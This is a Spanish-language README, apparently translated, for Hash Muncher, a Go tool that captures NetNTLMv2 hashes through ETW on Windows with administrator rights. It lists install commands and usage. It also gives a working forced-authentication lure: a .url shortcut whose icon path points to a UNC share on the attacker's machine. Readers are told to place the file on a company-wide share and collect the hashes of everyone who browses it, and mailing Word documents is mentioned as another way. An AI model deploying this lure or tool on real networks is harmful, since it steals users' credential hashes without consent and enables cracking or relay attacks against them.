
Captura los hashes NetNTLMv2 mediante ETW con privilegios administrativos en Windows 8.1 / Windows Server 2016 y versiones posteriores.
Captura hashes NetNTLMv2 usando ETW con privilegios administrativos en Windows
Tres opciones diferentes para ponerlo en marcha
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Asegúrese de que el Firewall de Windows permite "Compartir archivos e impresoras", ya que Hash Muncher requiere que el servicio SMB integrado envíe y reciba la solicitud inicial y los paquetes de respuesta hacia el objetivo.
En un símbolo del sistema elevado ejecute Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
Reemplace la dirección IP con su máquina Hash Muncher, guarde el archivo en un recurso compartido (de toda la empresa) como 'whatever.url', y observe cómo llegan los hashes.
Hay otros métodos mencionados en Red Team Notes - Forced Authentication, y probablemente también pueda tener éxito enviando por correo un documento de Word a todos, pero no es nada sigiloso.
He estado jugando con ETW de vez en cuando, pero una vez que vi la genial investigación de Nettitude Labs supe que tenía que convertirlo en una herramienta fácil de usar en mi lenguaje favorito, ¡Golang! Nettitude Labs tiene un POC funcional escrito en C# que se ejecuta bajo el framework .Net, y podría ser una mejor opción para usted. Así que realmente no estoy inventando nada aquí, solo lo añado como una alternativa.
Si le gustan los temas de seguridad de Windows, también le puede gustar mi herramienta de grafos de ataque Adalanche